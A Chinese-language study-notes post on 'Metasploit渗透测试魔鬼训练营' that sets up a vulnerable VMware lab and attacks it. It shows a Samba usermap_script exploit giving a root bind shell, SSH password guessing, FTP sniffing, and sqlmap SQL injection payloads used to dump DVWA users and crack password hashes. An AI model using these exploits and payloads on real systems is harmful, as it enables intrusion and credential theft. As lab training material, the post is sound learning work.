《Metasploit渗透测试魔鬼训练营》学习笔记

Metasploit渗透测试魔鬼训练营学习笔记

法律常识

中华人民共和国网络安全法》已由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,现予公布,自2017年6月1日起施行。
第二十条 国家支持企业和高等学校、职业学校等教育培训机构开展网络安全相关教育与培训,采取多种方式培养网络安全人才,促进网络安全人才交流。
第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具;明知他人从事危害网络安全的活动的,不得为其提供技术支持、广告推广、支付结算等帮助。
第四十四条 任何个人和组织不得窃取或者以其他非法方式获取个人信息,不得非法出售或者非法向他人提供个人信息。
第四十六条 任何个人和组织应当对其使用网络的行为负责,不得设立用于实施诈骗,传授犯罪方法,制作或者销售违禁物品、管制物品等违法犯罪活动的网站、通讯群组,不得利用网络发布涉及实施诈骗,制作或者销售违禁物品、管制物品以及其他违法犯罪活动的信息。
第四十八条 任何个人和组织发送的电子信息、提供的应用软件,不得设置恶意程序,不得含有法律、行政法规禁止发布或者传输的信息。

前言

本篇学习笔记主要涉及《Metasploit渗透测试魔鬼训练营》实验,原理篇见原书和其他文章。因阅读《Metasploit渗透测试魔鬼训练营》时发现有些实验方法与当前年份无法匹配,故撰写该篇学习笔记,如Back Track5已经停止维护现为Kali Linux,Kali Linux虚拟机占用资源远超于Windows应用Kali Linux占用资源等。

环境准备

环境概览

环境名称用途备注
Linux MetasploitableLinux靶机下载vmware虚拟机镜像
WinXP MetasploitableWindows靶机下载vmware虚拟机镜像
OWASP BWAWeb服务器靶机下载vmware虚拟机镜像
Win2K3 MetasploitableWindows靶机下载vmware虚拟机镜像
Kali LinuxLinux攻击机宿主机Windows 10上安装Metasploit/Kali Linux

环境下载

链接: https://pan.baidu.com/s/1I-OkdUcTwEx-TDoTT29hsw?pwd=rjpi
提取码: rjpi

环境部署

在这里插入图片描述

在这里插入图片描述在这里插入图片描述

在这里插入图片描述在这里插入图片描述

vmware虚拟网络编辑器配置

在这里插入图片描述在这里插入图片描述

在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述虽然所有靶机的地址应为DHCP获取,但是为了方便与书中保持一致,还是暂时配置为Static地址

Linux Metasploitable网络配置

在这里插入图片描述

vi /etc/network/interfaces
auth l0
iface l0 inet loopback

auto eth0
iface eth0 inet static
address 10.10.10.254
netmask 255.255.255.0

auto eth1
iface eth1 inet static
address 192.168.10.254
netmask 255.255.255.0
ifdown eth0
ifdown eth0
ifup eth0
ifup eth1

WinXP Metasploitable网络配置

在这里插入图片描述

C:\Documents and Settings\Administrator>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.10.128
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.10.254

OWASP BWA网络配置

在这里插入图片描述

vi /etc/network/interfaces
auto l0
iface l0 inet loopback

auto eth0
iface eth0 inet static
address 10.10.10.129
netmask 255.255.255.0
gateway 10.10.10.254
ifdown eth0
ifup eth0

Win2K3 Metasploitable网络配置

在这里插入图片描述

C:\Documents and Settings\Administrator>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . :
   IP Address. . . . . . . . . . . . : 10.10.10.130
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.254

网络配置成功标志

网络配置成功标志为每台设备都能ping通其他的所有地址,若单向能ping通,但双向ping不通可能是主机的防火墙策略拦截,属正常现象

ping 192.168.10.254
ping 10.10.10.254
ping 192.168.10.128
ping 10.10.10.128
ping 10.10.10.129
ping 10.10.10.130

对于环境中的IP均有相关的DNS域名配置信息,配置hosts文件配置对应的IP和域名解析情况
备注:在修改hosts文件前,要将属性中的只读勾选去掉,同时添加Everyone完全控制权限,在修改完成后将只读勾选,同时删除Everyone用户

notepad C:\Windows\System32\drivers\etc\hosts
10.10.10.128	attacker.dvssc.com
10.10.10.129	www.dvssc.com
10.10.10.130	service.dvssc.com
10.10.10.254	gate.dvssc.com
192.168.10.128	intranet1.dvssc.com

在这里插入图片描述在这里插入图片描述

Windows 10宿主机安装Metasploit/Kali Linux

下载Metasploit,双击msi文件运行后安装默认位置即可,配置环境变量c:/metasploit-framework
https://windows.metasploit.com/

或者在Windows 10应用商店中下载Kali Linux(亲测Kali Linux因网络配置原因无法使用辅助模块扫描等操作,推荐直接安装Metasploit,使用Kali Linux环境安装其他有且仅能Kali Linux环境安装的应用)

在这里插入图片描述

参考链接:
https://zhuanlan.zhihu.com/p/462187821
https://baijiahao.baidu.com/s?id=1689395460377352647&wfr=spider&for=pc
https://blog.csdn.net/qq_44159028/article/details/114635276

初识msfconsole

运行msfconsole

msfconsole
PS C:\Users\IDEA> msfconsole
C:/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/zeitwerk-2.5.4/lib/zeitwerk/kernel.rb:35: warning: Win32API is deprecated after Ruby 1.9.1; use fiddle directly instead
                                              `:oDFo:`
                                           ./ymM0dayMmy/.
                                        -+dHJ5aGFyZGVyIQ==+-
                                    `:sm⏣~~Destroy.No.Data~~s:`
                                 -+h2~~Maintain.No.Persistence~~h+-
                             `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`
                          ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.
                       -++SecKCoin++e.AMd`       `.-:/+hbove.913.ElsMNh+-
                      -~/.ssh/id_rsa.Des-                  `htN01UserWroteMe!-
                      :dopeAW.No<nano>o                     :is:TЯiKC.sudo-.A:
                      :we're.all.alike'`                     The.PFYroy.No.D7:
                      :PLACEDRINKHERE!:                      yxp_cmdshell.Ab0:
                      :msf>exploit -j.                       :Ns.BOB&ALICEes7:
                      :---srwxrwx:-.`                        `MS146.52.No.Per:
                      :<script>.Ac816/                        sENbove3101.404:
                      :NT_AUTHORITY.Do                        `T:/shSYSTEM-.N:
                      :09.14.2011.raid                       /STFU|wall.No.Pr:
                      :hevnsntSurb025N.                      dNVRGOING2GIVUUP:
                      :#OUTHOUSE-  -s:                       /corykennedyData:
                      :$nmap -oS                              SSo.6178306Ence:
                      :Awsm.da:                            /shMTl#beats3o.No.:
                      :Ring0:                             `dDestRoyREXKC3ta/M:
                      :23d:                               sSETEC.ASTRONOMYist:
                       /-                        /yo-    .ence.N:(){ :|: & };:
                                                 `:Shall.We.Play.A.Game?tron/
                                                 ```-ooy.if1ghtf0r+ehUser5`
                                               ..th3.H1V3.U2VjRFNN.jMh+.`
                                              `MjM~~WE.ARE.se~~MMjMs
                                               +~KANSAS.CITY's~-`
                                                J~HAKCERS~./.`
                                                .esc:wq!:`
                                                 +++ATH`
                                                  `


       =[ metasploit v6.1.38-dev-c252faf9388449dd3af4f0ab1288c0ce82fe4cf9]
+ -- --=[ 2212 exploits - 1171 auxiliary - 396 post       ]
+ -- --=[ 615 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: To save all commands executed since start up
to a file, use the makerc command

msf6 >

在这里插入图片描述

在这里插入图片描述

使用msfconsole

msf6 > search samba
msf6 > use multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > show payloads
msf6 exploit(multi/samba/usermap_script) > set payload cmd/unix/bind_netcat
msf6 exploit(multi/samba/usermap_script) > show options
msf6 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.254
msf6 exploit(multi/samba/usermap_script) > exploit
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started bind TCP handler against 10.10.10.254:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 10.10.10.254:4444) at 2022-04-10 12:18:37 +0800

在MSF终端里看到了“Command shell session 1 opened”的成功信息,这时可以输入一些Shell命令,如uname -a和whoami,来查看所控制的目标主机操作系统类型,以及所拥有的用户账户权限

msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started bind TCP handler against 10.10.10.254:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 10.10.10.254:4444) at 2022-04-10 12:18:37 +0800

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
whoami
root
ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:a8:c8:7a brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.254/24 brd 10.10.10.255 scope global eth0
    inet6 fe80::20c:29ff:fea8:c87a/64 scope link
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:a8:c8:84 brd ff:ff:ff:ff:ff:ff
    inet 192.168.10.254/24 brd 192.168.10.255 scope global eth1
    inet6 fe80::20c:29ff:fea8:c884/64 scope link
       valid_lft forever preferred_lft forever

模拟环境渗透测试

以下环节摒除正规渗透测试环境中的项目管理内容等,仅单纯利用Metasploit的各类模块对模拟环境进行渗透测试。

modules
    ├─auxiliary  # 辅助模块
    ├─encoders  # 编码工具模块
    ├─evasion  # 混淆模块
    ├─exploits  # 渗 透模块
    ├─nops  # 空模块
    ├─payloads  # 攻击载荷模块
    └─post  # 后期渗透模块

情报搜集

Metasploit为渗透测试的信息搜集环境提供了大量的辅助模块支持,包括针对各种网络服务的扫描与查点、构建虚假服务收集登录口令、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。辅助模块能够帮助渗透测试者在进行渗透攻击之前得到目标系统丰富的情报信息,从而发起更具目标性的精准攻击。
Metasploit位于情报搜集阶段主要利用auxiliary(辅助模块)。
auxiliary(辅助模块):包含扫描、fuzz测试、漏洞挖掘、网络协议欺骗等程序。

nslookup查询域名解析情况

msf6 > nslookup www.dvssc.com
[*] exec: nslookup www.dvssc.com

服务器:  RTK_GW.bbrouter
Address:  192.168.1.1

非权威应答:
名称:    hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com
Addresses:  54.209.32.212
          52.71.57.184
Aliases:  www.dvssc.com
          traff-1.hugedomains.com

whois

https://whois.chinaz.com/

使用dir_scanner辅助模块搜索网站目录

msf6 > use auxiliary/scanner/http/dir_scanner
msf6 auxiliary(scanner/http/dir_scanner) > set threads 50
threads => 50
msf6 auxiliary(scanner/http/dir_scanner) > set rhosts www.dvssc.com
rhosts => www.dvssc.com
msf6 auxiliary(scanner/http/dir_scanner) > exploit

[-] Warning: The Windows platform cannot reliably support more than 16 threads
[-] Thread count has been adjusted to 16
[*] Detecting error code
[*] Using code '404' as not found for 10.10.10.129
[+][+][+][+][+] Found http://www.dvssc.com:80/001/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/1/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/3/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/0001/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/0/ 503 (10.10.10.129)
[+] Found http://www.dvssc.com:80/00001/ 503 (10.10.10.129)
[+][+][+][+] Found http://www.dvssc.com:80/1000/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/11/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/111/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/10/ 503 (10.10.10.129)
[+][+][+][+][+] Found http://www.dvssc.com:80/04/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/123/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/1111/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/007/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/123321/ 503 (10.10.10.129)
[+][+][+] Found http://www.dvssc.com:80/123123/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/1337/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/2/ 503 (10.10.10.129)
[+][+][+] Found http://www.dvssc.com:80/777/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/6/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/5/ 503 (10.10.10.129)
[+][+][+][+] Found http://www.dvssc.com:80/666/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/8/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/7/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/606/ 503 (10.10.10.129)
[+] Found http://www.dvssc.com:80/4/ 503 (10.10.10.129)
[+][+] Found http://www.dvssc.com:80/911911/ 503 (10.10.10.129)
 Found http://www.dvssc.com:80/9/ 503 (10.10.10.129)
[+] Found http://www.dvssc.com:80/CHANGELOG/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/LICENSE/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/administrator/ 302 (10.10.10.129)
[+] Found http://www.dvssc.com:80/cache/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/cgi-bin/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/components/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/css/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/doc/ 403 (10.10.10.129)
[+] Found http://www.dvssc.com:80/f/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/gallery2/ 302 (10.10.10.129)
[+] Found http://www.dvssc.com:80/ghost/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/icons/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/images/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/includes/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/installation/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/javascript/ 403 (10.10.10.129)
[+] Found http://www.dvssc.com:80/js/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/libraries/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/language/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/login/ 500 (10.10.10.129)
[+] Found http://www.dvssc.com:80/logs/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/media/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/modules/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/phpBB2/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/plugins/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/phpmyadmin/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/templates/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/tmp/ 200 (10.10.10.129)
[+] Found http://www.dvssc.com:80/wordpress/ 200 (10.10.10.129)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/dir_scanner) >

使用arp_sweep模块探查活跃主机

msf6 > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > set rhosts 10.10.10.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 10
msf6 auxiliary(scanner/discovery/arp_sweep) > run

在MSF终端中运行Nmap扫描工具

msf6 > nmap 10.10.10.0/24

使用Nmap进行活跃主机探则

msf6 > nmap -Pn 10.10.10.0/24

使用Nmap探测目标主机的操作系统版本

msf6 > nmap -O 10.10.10.0/24

Telnet服务扫描

msf6 > use auxiliary/scanner/telnet/telnet_version
msf6 auxiliary(scanner/telnet/telnet_version) > set rhost 10.10.10.0/24
msf6 auxiliary(scanner/telnet/telnet_version) > set threads 100
msf6 auxiliary(scanner/telnet/telnet_version) > run

SSH服务扫描

search ssh_version
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > set rhost 10.10.10.0/24
msf6 auxiliary(scanner/ssh/ssh_version) > set threads 100
msf6 auxiliary(scanner/ssh/ssh_version) > run
search ssh_login
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 10.10.10.254
set RPORT 22
set STOP_ON_SUCCESS false
set BLANK_PASSWORDS true
set USER_FILE "c:\resource\user.txt"
set PASS_FILE "c:\resource\pass.txt"

Oracle服务扫描

msf6 > use auxiliary/scanner/oracle/tnslsnr_version
msf6 auxiliary(scanner/oracle/tnslsnr_version) > set rhosts 10.10.10.0/24
msf6 auxiliary(scanner/oracle/tnslsnr_version) > set threads 50
msf6 auxiliary(scanner/oracle/tnslsnr_version) > run

SSH服务弱口令探测

msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 10.10.10.254
msf6 auxiliary(scanner/ssh/ssh_login) > set uesrname root
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /root/words.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set thread 50
msf6 auxiliary(scanner/ssh/ssh_login) > run

通过嗅探获取FTP用户名和口令

msf6 > use auxiliary/sniffer/psnuffle
msf6 auxiliary(sniffer/psnuffle) > run

Nessus网络漏洞扫描

详情阅读另一篇CentOS Docker环境部署Nessus

渗透攻击

Metasploit利用目标系统安全漏洞入侵系统并获得访问控制权。Metasploit位于渗透攻击阶段主要利用exploit(渗透模块)、payload(安全载荷模块)。
exploit(渗透模块):是一段程序,运行时会利用目标的安全漏洞进行安全测试。
payload(安全载荷模块):在成功对目标完成一次渗透测试,payload将在目标机器运行,帮助我们获取目标上需要的访问和运行权限。

Web应用渗透

SQL注入

Sqlmap扫描
Metasploit中没有Sqlmap模块了,需要直接安装Sqlmap
python3直接在Windows10应用商店中安装
在这里插入图片描述
https://sqlmap.org/
下载解压重命名为sqlmap放置到c目录下python c:/sqlmap/sqlmap.py+参数直接执行

在这里插入图片描述

http://10.10.10.129/dvwa/login.php
uesrname:admin
password:admin

选择Damn Vulnerable Web Application
在这里插入图片描述设置DVWA Security为low

在这里插入图片描述
选择SQL Injection
在这里插入图片描述

python c:/sqlmap/sqlmap.py -u http://10.10.10.129/dvwa/vulnerabilities/sqli/
PS C:\Users\IDEA> python c:/sqlmap/sqlmap.py -u http://10.10.10.129/dvwa/vulnerabilities/sqli/
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.4.4#dev}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:21:13 /2022-04-14/

[21:21:14] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q]

[21:21:15] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.10.10.129:80/dvwa/login.php'. Do you want to follow? [Y/n]

you have not declared cookie(s), while server wants to set its own ('PHPSESSID=9547p2gdpmv...u0t9jme0i1;security=high;security=high'). Do you want to use those [Y/n]

[21:21:17] [INFO] testing if the target URL content is stable
[21:21:17] [WARNING] URI parameter '#1*' does not appear to be dynamic
[21:21:17] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[21:21:17] [INFO] testing for SQL injection on URI parameter '#1*'
[21:21:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:21:17] [WARNING] reflective value(s) found and filtering out
[21:21:17] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:21:17] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:21:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:21:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[21:21:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:21:17] [INFO] testing 'Generic inline queries'
[21:21:17] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:21:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[21:21:18] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[21:21:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:21:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:21:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[21:21:18] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]

[21:21:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:21:19] [WARNING] URI parameter '#1*' does not seem to be injectable
[21:21:19] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[21:21:19] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 72 times

[*] ending @ 21:21:19 /2022-04-14/

Sqlmap提示信息,它还是希望我们对于GET请求或POST请求提供参数,故添加参数

you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself?

Sqlmap提示信息,它表示在测试过程会302重定向到登录界面,故添加Cookie保持登录状态

testing connection to the target URL
got a 302 redirect to 'http://10.10.10.129:80/dvwa/login.php'. Do you want to follow?

Sqlmap提示信息,它表示暂时没有发现注入点,是否要减少请求数量

it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests?

打开F12调试器刷新界面点击任意请求查看Cookie信息
在这里插入图片描述

python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low"
PS C:\Users\IDEA> python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low"
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.4.4#dev}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:47:37 /2022-04-14/

[21:47:37] [INFO] resuming back-end DBMS 'mysql'
[21:47:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 8674=8674#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 6595 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6595=6595,1))),0x7162626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- PvMo&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))nllG)-- VIMR&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x716b627a71,0x55566c6a537556486d63506c4d56795972755679466965624a65696a454d6c4b555a786e6b4b4e4d,0x7162626271),NULL#&Submit=Submit
---
[21:47:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL >= 5.0
[21:47:37] [INFO] fetched data logged to text files under 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129'

[*] ending @ 21:47:37 /2022-04-14/

Sqlmap提示信息,数据库为MySQL数据库

resuming back-end DBMS 'mysql'

Sqlmap提示信息,注入点为Parameter: id (GET)

Parameter: id (GET)

Sqlmap提示信息,SQL注入类型为Boolean注入、报错注入、时间注入、Union注入

Type: boolean-based blind
Type: error-based
Type: time-based blind
Type: UNION query

Sqlmap提示信息,payload

Payload: id=1' OR NOT 8674=8674#&Submit=Submit
Payload: id=1' AND (SELECT 6595 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6595=6595,1))),0x7162626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- PvMo&Submit=Submit
Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))nllG)-- VIMR&Submit=Submit
Payload: id=1' UNION ALL SELECT CONCAT(0x716b627a71,0x55566c6a537556486d63506c4d56795972755679466965624a65696a454d6c4b555a786e6b4b4e4d,0x7162626271),NULL#&Submit=Submit

添加dump参数获取数据库数据,测试环境数据量小能够直接dump,数据量大要逐步查询数据库database、数据表table、数据字段columns、数据data,分别使用参数dbs、tables、columns、dump

python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low" --dump
PS C:\Users\IDEA> python c:/sqlmap/sqlmap.py -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=0clv2ps64jve3460qfreo480i0;security=low" --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.4.4#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:57:58 /2022-04-14/

[21:57:58] [INFO] resuming back-end DBMS 'mysql'
[21:57:58] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 8674=8674#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 6595 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6595=6595,1))),0x7162626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- PvMo&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8003 FROM (SELECT(SLEEP(5)))nllG)-- VIMR&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x716b627a71,0x55566c6a537556486d63506c4d56795972755679466965624a65696a454d6c4b555a786e6b4b4e4d,0x7162626271),NULL#&Submit=Submit
---
[21:57:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
[21:57:58] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:57:58] [INFO] fetching current database
[21:57:58] [INFO] fetching tables for database: 'dvwa'
[21:57:58] [INFO] fetching columns for table 'guestbook' in database 'dvwa'
[21:57:58] [INFO] fetching entries for table 'guestbook' in database 'dvwa'
[21:57:58] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: guestbook
[1 entry]
+------------+------+-------------------------+
| comment_id | name | comment                 |
+------------+------+-------------------------+
| 1          | test | This is a test comment. |
+------------+------+-------------------------+

[21:57:58] [INFO] table 'dvwa.guestbook' dumped to CSV file 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129\dump\dvwa\guestbook.csv'
[21:57:58] [INFO] fetching columns for table 'users' in database 'dvwa'
[21:57:58] [INFO] fetching entries for table 'users' in database 'dvwa'
[21:57:58] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]

do you want to crack them via a dictionary-based attack? [Y/n/q]

[21:58:04] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\sqlmap\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>

[21:58:04] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]

[21:58:05] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[21:58:05] [INFO] starting 8 processes
[' for hash '21:58:11e99a18c428cb38d5f260853678922e03] ['
[21:58:1321:58:13] [] [INFOINFO] cracked password '] current status: BCfNi... /charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[21:58:16] [INFO] cracked password 'admin' for hash '21232f297a57a5a743894a0e4a801fc3'
['NFO21:58:17] cracked password '] [INFOletmein] current status: bab12... -' for hash '0d107d09f5bbe40cade3de5c71e9e9b7
